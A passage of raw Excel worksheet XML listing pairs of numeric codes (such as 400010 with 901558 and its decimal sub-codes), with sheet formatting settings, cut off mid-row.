      <c r="A47" s="3">
        <v>300024</v>
      </c>
      <c r="B47" s="3">
        <v>612046</v>
      </c>
    </row>
    <row r="48" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A48" s="3">
        <v>300005</v>
      </c>
      <c r="B48" s="3">
        <v>612047</v>
      </c>
    </row>
    <row r="49" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A49" s="3">
        <v>300005</v>
      </c>
      <c r="B49" s="3">
        <v>612048</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="1" type="noConversion"/>
  <conditionalFormatting sqref="E2:E49">
    <cfRule type="duplicateValues" dxfId="2" priority="1"/>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5BC19-0071-45B4-B018-A19F5B3DB152}">
  <dimension ref="A1:B1667"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="F4" sqref="F4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="2" max="2" width="11.77734375" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1" s="3" t="s">
        <v>11</v>
      </c>
      <c r="B1" s="3" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="2" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2" s="6">
        <v>400010</v>
      </c>
      <c r="B2" s="3">
        <v>901558</v>
      </c>
    </row>
    <row r="3" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A3" s="6">
        <v>400010</v>
      </c>
      <c r="B3" s="3">
        <v>901558.00100000005</v>
      </c>
    </row>
    <row r="4" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A4" s="6">
        <v>400010</v>
      </c>
      <c r="B4" s="3">
        <v>901558.00199999998</v>
      </c>
    </row>
    <row r="5" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A5" s="6">
        <v>400010</v>
      </c>
      <c r="B5" s="3">
        <v>901558.00300000003</v>
      </c>
    </row>
    <row r="6" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A6" s="6">
        <v>400010</v>
      </c>
      <c r="B6" s="3">
        <v>901558.00399999996</v>
      </c>
    </row>
    <row r="7" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A7" s="6">
        <v>400010</v>
      </c>
      <c r="B7" s="3">
        <v>901550</v>
      </c>
    </row>
    <row r="8" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A8" s="6">
        <v>400010</v>
      </c>
      <c r="B8" s="3">
        <v>901550.00199999998</v>
      </c>
    </row>
    <row r="9" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A9" s="6">
        <v>400010</v>
      </c>
      <c r="B9" s="3">
        <v>901550.00300000003</v>
      </c>
    </row>
    <row r="10" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A10" s="6">
        <v>400011</v>
      </c>
      <c r="B10" s="3">
        <v>901615</v>
      </c>
    </row>
    <row r="11" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A11" s="6">
        <v>400011</v>
      </c>
      <c r="B11" s="3">
        <v>901003</v>
      </c>
    </row>
    <row r="12" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A12" s="6">
        <v>400011</v>
      </c>
      <c r="B12" s="3">
        <v>901003.00600000005</v>
      </c>
    </row>
    <row r="13" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A13" s="6">
        <v>400012</v>
      </c>
      <c r="B13" s="3">
        <v>901484</v>
      </c>
    </row>
    <row r="14" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A14" s="6">
        <v>400012</v>
      </c>
      <c r="B14" s="3">
        <v>901484.00100000005</v>
      </c>
    </row>
    <row r="15" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A15" s="6">
        <v>400012</v>
      </c>
      <c r="B15" s="3">
        <v>901484.00199999998</v>
      </c>
    </row>
    <row r="16" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A16" s="6">
        <v>400012</v>
      </c>
      <c r="B16" s="3">
        <v>901207</v>
      </c>
    </row>
    <row r="17" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A17" s="6">
        <v>400013</v>
      </c>
      <c r="B17" s="3">
        <v>901484</v>
      </c>
    </row>
    <row r="18" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A18" s="6">
        <v>400013</v>
      </c>
      <c r="B18" s="3">
        <v>901484.00100000005</v>
      </c>
    </row>
    <row r="19" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A19" s="6">
        <v>400014</v>
      </c>
      <c r="B19" s="3">
        <v>901134</v>
      </c>
    </row>
    <row r="20" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A20" s="6">
        <v>400014</v>
      </c>
      <c r="B20" s="3">
        <v>901134.005</v>
      </c>
    </row>
    <row r="21" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A21" s="6">
        <v>400014</v>
      </c>
      <c r="B21" s="3">
        <v>901531</v>
      </c>
    </row>
    <row r="22" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A22" s="6">
        <v>400014</v>
      </c>
      <c r="B22" s="3">
        <v>901098</v>
      </c>
    </row>
    <row r="23" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A23" s="6">
        <v>400014</v>
      </c>
      <c r="B23" s="3">
        <v>901098.00100000005</v>
      </c>
    </row>
    <row r="24" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A24" s="6">
        <v>400014</v>
      </c>
      <c r="B24" s="3">
        <v>901037</v>
      </c>
    </row>
    <row r="25" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A25" s="6">
        <v>400014</v>
      </c>
      <c r="B25" s="3">
        <v>901037.00300000003</v>
      </c>
    </row>
    <row r="26" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A26" s="6">
        <v>400014</v>
      </c>
      <c r="B26" s="3">
        <v>901484</v>
      </c>
    </row>
    <row r="27" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A27" s="6">
        <v>400014</v>
      </c>
      <c r="B27" s="3">
        <v>901484.00100000005</v>
      </c>
    </row>
    <row r="28" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A28" s="6">
        <v>400014</v>
      </c>
      <c r="B28" s="3">
        <v>901484.00199999998</v>
      </c>
    </row>
    <row r="29" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A29" s="6">
        <v>400014</v>
      </c>
      <c r="B29" s="3">
        <v>901222</v>
      </c>
    </row>
    <row r="30" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A30" s="6">
        <v>400014</v>
      </c>
      <c r="B30" s="3">
        <v>901222.00100000005</v>
      </c>
    </row>
    <row r="31" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A31" s="6">
        <v>400014</v>
      </c>
      <c r="B31" s="3">
        <v>901207</v>
      </c>
    </row>
    <row r="32" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A32" s="6">
        <v>400020</v>
      </c>
      <c r="B32" s="3">
        <v>901098.00199999998</v>
      </c>
    </row>
    <row r="33" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A33" s="6">
        <v>400020</v>
      </c>
      <c r="B33" s="3">
        <v>901110</v>
      </c>
    </row>
    <row r="34" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A34" s="6">
        <v>400020</v>
      </c>
      <c r="B34" s="3">
        <v>901110.00100000005</v>
      </c>
    </row>
    <row r="35" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A35" s="6">
        <v>400020</v>
      </c>
      <c r="B35" s="3">
        <v>901110.00199999998</v>
      </c>
    </row>
    <row r="36" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A36" s="6">
        <v>400020</v>
      </c>
      <c r="B36" s="3">
        <v>901110.00300000003</v>
      </c>
    </row>
    <row r="37" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A37" s="6">
        <v>400020</v>
      </c>
      <c r="B37" s="3">
        <v>901110.00399999996</v>
      </c>
    </row>
    <row r="38" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A38" s="6">
        <v>400020</v>
      </c>
      <c r="B38" s="3">
        <v>901613</v>
      </c>
    </row>
    <row r="39" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A39" s="6">
        <v>400020</v>
      </c>
      <c r="B39" s="3">
        <v>901213</v>
      </c>
    </row>
    <row r="40" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A40" s="6">
        <v>400020</v>
      </c>
      <c r="B40" s="3">
        <v>901213.00100000005</v>
      </c>
    </row>
    <row r="41" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A41" s="6">
        <v>400020</v>
      </c>
      <c r="B41" s="3">
        <v>901213.00199999998</v>
      </c>
    </row>
    <row r="42" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A42" s="6">
        <v>400020</v>
      </c>
      <c r="B42" s="3">
        <v>901213.00300000003</v>
      </c>
    </row>
    <row r="43" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A43" s="6">
        <v>400020</v>
      </c>
      <c r="B43" s="3">
        <v>901491</v>
      </c>
    </row>
    <row r="44" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A44" s="6">
        <v>400020</v>
      </c>
      <c r="B44" s="3">
        <v>901491.00100000005</v>
      </c>
    </row>
    <row r="45" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A45" s="6">
        <v>400020</v>
      </c>
      <c r="B45" s="3">
        <v>901491.00199999998</v>
      </c>
    </row>
    <row r="46" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A46" s="6">
        <v>400020</v>
      </c>
      <c r="B46" s="3">
        <v>901610</v>
      </c>
    </row>
    <row r="47" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A47" s="6">
        <v>400020</v>
      </c>
      <c r="B47" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="48" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A48" s="6">
        <v>400020</v>
      </c>
      <c r="B48" s="3">
        <v>901114</v>
      </c>
    </row>
    <row r="49" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A49" s="6">
        <v>400020</v>
      </c>
      <c r="B49" s="3">
        <v>901114.00300000003</v>
      </c>
    </row>
    <row r="50" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A50" s="6">
        <v>400020</v>
      </c>
      <c r="B50" s="3">
        <v>901499</v>
      </c>
    </row>
    <row r="51" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A51" s="6">
        <v>400020</v>
      </c>
      <c r="B51" s="3">
        <v>901499.00199999998</v>
      </c>
    </row>
    <row r="52" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A52" s="6">
        <v>400020</v>
      </c>
      <c r="B52" s="3">
        <v>901499.00300000003</v>
      </c>
    </row>
    <row r="53" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A53" s="6">
        <v>400020</v>
      </c>
      <c r="B53" s="3">
        <v>901499.00399999996</v>
      </c>
    </row>
    <row r="54" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A54" s="6">
        <v>400020</v>
      </c>
      <c r="B54" s="3">
        <v>901190</v>
      </c>
    </row>
    <row r="55" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A55" s="6">
        <v>400020</v>
      </c>
      <c r="B55" s="3">
        <v>901210</v>
      </c>
    </row>
    <row r="56" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A56" s="6">
        <v>400020</v>
      </c>
      <c r="B56" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="57" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A57" s="6">
        <v>400020</v>
      </c>
      <c r="B57" s="3">
        <v>901564</v>
      </c>
    </row>
    <row r="58" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A58" s="6">
        <v>400020</v>
      </c>
      <c r="B58" s="3">
        <v>901564.00800000003</v>
      </c>
    </row>
    <row r="59" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A59" s="6">
        <v>400020</v>
      </c>
      <c r="B59" s="3">
        <v>901562.00199999998</v>
      </c>
    </row>
    <row r="60" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A60" s="6">
        <v>400020</v>
      </c>
      <c r="B60" s="3">
        <v>901534</v>
      </c>
    </row>
    <row r="61" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A61" s="6">
        <v>400020</v>
      </c>
      <c r="B61" s="3">
        <v>901137</v>
      </c>
    </row>
    <row r="62" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A62" s="6">
        <v>400020</v>
      </c>
      <c r="B62" s="3">
        <v>901137.00300000003</v>
      </c>
    </row>
    <row r="63" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A63" s="6">
        <v>400020</v>
      </c>
      <c r="B63" s="3">
        <v>901137.00399999996</v>
      </c>
    </row>
    <row r="64" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A64" s="6">
        <v>400020</v>
      </c>
      <c r="B64" s="3">
        <v>901137.005</v>
      </c>
    </row>
    <row r="65" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A65" s="6">
        <v>400020</v>
      </c>
      <c r="B65" s="3">
        <v>901069</v>
      </c>
    </row>
    <row r="66" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A66" s="6">
        <v>400020</v>
      </c>
      <c r="B66" s="3">
        <v>901069.00300000003</v>
      </c>
    </row>
    <row r="67" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A67" s="6">
        <v>400020</v>
      </c>
      <c r="B67" s="3">
        <v>901566</v>
      </c>
    </row>
    <row r="68" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A68" s="6">
        <v>400020</v>
      </c>
      <c r="B68" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="69" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A69" s="6">
        <v>400020</v>
      </c>
      <c r="B69" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="70" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A70" s="6">
        <v>400020</v>
      </c>
      <c r="B70" s="3">
        <v>901566.00300000003</v>
      </c>
    </row>
    <row r="71" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A71" s="6">
        <v>400020</v>
      </c>
      <c r="B71" s="3">
        <v>901598</v>
      </c>
    </row>
    <row r="72" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A72" s="6">
        <v>400020</v>
      </c>
      <c r="B72" s="3">
        <v>901598.00100000005</v>
      </c>
    </row>
    <row r="73" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A73" s="6">
        <v>400020</v>
      </c>
      <c r="B73" s="3">
        <v>901598.00199999998</v>
      </c>
    </row>
    <row r="74" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A74" s="6">
        <v>400020</v>
      </c>
      <c r="B74" s="3">
        <v>901598.00300000003</v>
      </c>
    </row>
    <row r="75" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A75" s="6">
        <v>400020</v>
      </c>
      <c r="B75" s="3">
        <v>901594</v>
      </c>
    </row>
    <row r="76" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A76" s="6">
        <v>400020</v>
      </c>
      <c r="B76" s="3">
        <v>901505</v>
      </c>
    </row>
    <row r="77" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A77" s="6">
        <v>400020</v>
      </c>
      <c r="B77" s="3">
        <v>901505.00100000005</v>
      </c>
    </row>
    <row r="78" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A78" s="6">
        <v>400020</v>
      </c>
      <c r="B78" s="3">
        <v>901505.00199999998</v>
      </c>
    </row>
    <row r="79" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A79" s="6">
        <v>400020</v>
      </c>
      <c r="B79" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="80" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A80" s="6">
        <v>400020</v>
      </c>
      <c r="B80" s="3">
        <v>901072</v>
      </c>
    </row>
    <row r="81" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A81" s="6">
        <v>400020</v>
      </c>
      <c r="B81" s="3">
        <v>901199</v>
      </c>
    </row>
    <row r="82" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A82" s="6">
        <v>400020</v>
      </c>
      <c r="B82" s="3">
        <v>901550</v>
      </c>
    </row>
    <row r="83" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A83" s="6">
        <v>400020</v>
      </c>
      <c r="B83" s="3">
        <v>901550.00100000005</v>
      </c>
    </row>
    <row r="84" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A84" s="6">
        <v>400020</v>
      </c>
      <c r="B84" s="3">
        <v>901550.00399999996</v>
      </c>
    </row>
    <row r="85" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A85" s="6">
        <v>400020</v>
      </c>
      <c r="B85" s="3">
        <v>901204</v>
      </c>
    </row>
    <row r="86" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A86" s="6">
        <v>400020</v>
      </c>
      <c r="B86" s="3">
        <v>901204.00300000003</v>
      </c>
    </row>
    <row r="87" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A87" s="6">
        <v>400030</v>
      </c>
      <c r="B87" s="3">
        <v>901588</v>
      </c>
    </row>
    <row r="88" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A88" s="6">
        <v>400030</v>
      </c>
      <c r="B88" s="3">
        <v>901588.00399999996</v>
      </c>
    </row>
    <row r="89" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A89" s="6">
        <v>400040</v>
      </c>
      <c r="B89" s="3">
        <v>901562</v>
      </c>
    </row>
    <row r="90" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A90" s="6">
        <v>400040</v>
      </c>
      <c r="B90" s="3">
        <v>901562.00800000003</v>
      </c>
    </row>
    <row r="91" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A91" s="6">
        <v>400041</v>
      </c>
      <c r="B91" s="3">
        <v>901526</v>
      </c>
    </row>
    <row r="92" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A92" s="6">
        <v>400041</v>
      </c>
      <c r="B92" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="93" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A93" s="6">
        <v>400042</v>
      </c>
      <c r="B93" s="3">
        <v>901526</v>
      </c>
    </row>
    <row r="94" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A94" s="6">
        <v>400043</v>
      </c>
      <c r="B94" s="3">
        <v>901562</v>
      </c>
    </row>
    <row r="95" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A95" s="6">
        <v>400043</v>
      </c>
      <c r="B95" s="3">
        <v>901562.00800000003</v>
      </c>
    </row>
    <row r="96" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A96" s="6">
        <v>400050</v>
      </c>
      <c r="B96" s="3">
        <v>901619</v>
      </c>
    </row>
    <row r="97" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A97" s="6">
        <v>400050</v>
      </c>
      <c r="B97" s="3">
        <v>901530</v>
      </c>
    </row>
    <row r="98" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A98" s="6">
        <v>400051</v>
      </c>
      <c r="B98" s="3">
        <v>901537</v>
      </c>
    </row>
    <row r="99" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A99" s="6">
        <v>400052</v>
      </c>
      <c r="B99" s="3">
        <v>901485</v>
      </c>
    </row>
    <row r="100" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A100" s="6">
        <v>400053</v>
      </c>
      <c r="B100" s="3">
        <v>901580</v>
      </c>
    </row>
    <row r="101" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A101" s="6">
        <v>400053</v>
      </c>
      <c r="B101" s="3">
        <v>901619</v>
      </c>
    </row>
    <row r="102" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A102" s="6">
        <v>400054</v>
      </c>
      <c r="B102" s="3">
        <v>901580</v>
      </c>
    </row>
    <row r="103" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A103" s="6">
        <v>400054</v>
      </c>
      <c r="B103" s="3">
        <v>901486</v>
      </c>
    </row>
    <row r="104" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A104" s="6">
        <v>400055</v>
      </c>
      <c r="B104" s="3">
        <v>901486</v>
      </c>
    </row>
    <row r="105" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A105" s="6">
        <v>400055</v>
      </c>
      <c r="B105" s="3">
        <v>901537</v>
      </c>
    </row>
    <row r="106" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A106" s="6">
        <v>400060</v>
      </c>
      <c r="B106" s="3">
        <v>901613</v>
      </c>
    </row>
    <row r="107" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A107" s="6">
        <v>400070</v>
      </c>
      <c r="B107" s="3">
        <v>901548</v>
      </c>
    </row>
    <row r="108" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A108" s="6">
        <v>400070</v>
      </c>
      <c r="B108" s="3">
        <v>901548.00100000005</v>
      </c>
    </row>
    <row r="109" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A109" s="6">
        <v>400070</v>
      </c>
      <c r="B109" s="3">
        <v>901548.00199999998</v>
      </c>
    </row>
    <row r="110" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A110" s="6">
        <v>400070</v>
      </c>
      <c r="B110" s="3">
        <v>901548.00300000003</v>
      </c>
    </row>
    <row r="111" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A111" s="6">
        <v>400070</v>
      </c>
      <c r="B111" s="3">
        <v>901134</v>
      </c>
    </row>
    <row r="112" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A112" s="6">
        <v>400070</v>
      </c>
      <c r="B112" s="3">
        <v>901134.00100000005</v>
      </c>
    </row>
    <row r="113" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A113" s="6">
        <v>400070</v>
      </c>
      <c r="B113" s="3">
        <v>901134.00199999998</v>
      </c>
    </row>
    <row r="114" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A114" s="6">
        <v>400070</v>
      </c>
      <c r="B114" s="3">
        <v>901134.00300000003</v>
      </c>
    </row>
    <row r="115" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A115" s="6">
        <v>400070</v>
      </c>
      <c r="B115" s="3">
        <v>901087</v>
      </c>
    </row>
    <row r="116" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A116" s="6">
        <v>400070</v>
      </c>
      <c r="B116" s="3">
        <v>901087.00100000005</v>
      </c>
    </row>
    <row r="117" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A117" s="6">
        <v>400070</v>
      </c>
      <c r="B117" s="3">
        <v>901087.00199999998</v>
      </c>
    </row>
    <row r="118" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A118" s="6">
        <v>400070</v>
      </c>
      <c r="B118" s="3">
        <v>901087.00300000003</v>
      </c>
    </row>
    <row r="119" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A119" s="6">
        <v>400070</v>
      </c>
      <c r="B119" s="3">
        <v>901087.00399999996</v>
      </c>
    </row>
    <row r="120" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A120" s="6">
        <v>400070</v>
      </c>
      <c r="B120" s="3">
        <v>901098</v>
      </c>
    </row>
    <row r="121" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A121" s="6">
        <v>400070</v>
      </c>
      <c r="B121" s="3">
        <v>901098.00399999996</v>
      </c>
    </row>
    <row r="122" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A122" s="6">
        <v>400070</v>
      </c>
      <c r="B122" s="3">
        <v>901010</v>
      </c>
    </row>
    <row r="123" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A123" s="6">
        <v>400070</v>
      </c>
      <c r="B123" s="3">
        <v>901560</v>
      </c>
    </row>
    <row r="124" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A124" s="6">
        <v>400070</v>
      </c>
      <c r="B124" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="125" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A125" s="6">
        <v>400070</v>
      </c>
      <c r="B125" s="3">
        <v>901123</v>
      </c>
    </row>
    <row r="126" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A126" s="6">
        <v>400070</v>
      </c>
      <c r="B126" s="3">
        <v>901119</v>
      </c>
    </row>
    <row r="127" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A127" s="6">
        <v>400070</v>
      </c>
      <c r="B127" s="3">
        <v>901020</v>
      </c>
    </row>
    <row r="128" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A128" s="6">
        <v>400070</v>
      </c>
      <c r="B128" s="3">
        <v>901197</v>
      </c>
    </row>
    <row r="129" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A129" s="6">
        <v>400070</v>
      </c>
      <c r="B129" s="3">
        <v>901547</v>
      </c>
    </row>
    <row r="130" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A130" s="6">
        <v>400070</v>
      </c>
      <c r="B130" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="131" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A131" s="6">
        <v>400070</v>
      </c>
      <c r="B131" s="3">
        <v>901547.00199999998</v>
      </c>
    </row>
    <row r="132" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A132" s="6">
        <v>400070</v>
      </c>
      <c r="B132" s="3">
        <v>901547.00300000003</v>
      </c>
    </row>
    <row r="133" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A133" s="6">
        <v>400070</v>
      </c>
      <c r="B133" s="3">
        <v>901547.00399999996</v>
      </c>
    </row>
    <row r="134" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A134" s="6">
        <v>400070</v>
      </c>
      <c r="B134" s="3">
        <v>901547.005</v>
      </c>
    </row>
    <row r="135" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A135" s="6">
        <v>400070</v>
      </c>
      <c r="B135" s="3">
        <v>901547.00600000005</v>
      </c>
    </row>
    <row r="136" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A136" s="6">
        <v>400070</v>
      </c>
      <c r="B136" s="3">
        <v>901547.00699999998</v>
      </c>
    </row>
    <row r="137" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A137" s="6">
        <v>400070</v>
      </c>
      <c r="B137" s="3">
        <v>901547.01100000006</v>
      </c>
    </row>
    <row r="138" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A138" s="6">
        <v>400070</v>
      </c>
      <c r="B138" s="3">
        <v>901547.01300000004</v>
      </c>
    </row>
    <row r="139" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A139" s="6">
        <v>400070</v>
      </c>
      <c r="B139" s="3">
        <v>901547.01399999997</v>
      </c>
    </row>
    <row r="140" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A140" s="6">
        <v>400070</v>
      </c>
      <c r="B140" s="3">
        <v>901037</v>
      </c>
    </row>
    <row r="141" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A141" s="6">
        <v>400070</v>
      </c>
      <c r="B141" s="3">
        <v>901037.00100000005</v>
      </c>
    </row>
    <row r="142" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A142" s="6">
        <v>400070</v>
      </c>
      <c r="B142" s="3">
        <v>901037.00199999998</v>
      </c>
    </row>
    <row r="143" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A143" s="6">
        <v>400070</v>
      </c>
      <c r="B143" s="3">
        <v>901037.00300000003</v>
      </c>
    </row>
    <row r="144" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A144" s="6">
        <v>400070</v>
      </c>
      <c r="B144" s="3">
        <v>901037.00399999996</v>
      </c>
    </row>
    <row r="145" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A145" s="6">
        <v>400070</v>
      </c>
      <c r="B145" s="3">
        <v>901037.005</v>
      </c>
    </row>
    <row r="146" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A146" s="6">
        <v>400070</v>
      </c>
      <c r="B146" s="3">
        <v>901217</v>
      </c>
    </row>
    <row r="147" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A147" s="6">
        <v>400070</v>
      </c>
      <c r="B147" s="3">
        <v>901176</v>
      </c>
    </row>
    <row r="148" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A148" s="6">
        <v>400070</v>
      </c>
      <c r="B148" s="3">
        <v>901110</v>
      </c>
    </row>
    <row r="149" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A149" s="6">
        <v>400070</v>
      </c>
      <c r="B149" s="3">
        <v>901115</v>
      </c>
    </row>
    <row r="150" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A150" s="6">
        <v>400070</v>
      </c>
      <c r="B150" s="3">
        <v>901059</v>
      </c>
    </row>
    <row r="151" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A151" s="6">
        <v>400070</v>
      </c>
      <c r="B151" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="152" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A152" s="6">
        <v>400070</v>
      </c>
      <c r="B152" s="3">
        <v>901059.00199999998</v>
      </c>
    </row>
    <row r="153" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A153" s="6">
        <v>400070</v>
      </c>
      <c r="B153" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="154" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A154" s="6">
        <v>400070</v>
      </c>
      <c r="B154" s="3">
        <v>901059.00399999996</v>
      </c>
    </row>
    <row r="155" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A155" s="6">
        <v>400070</v>
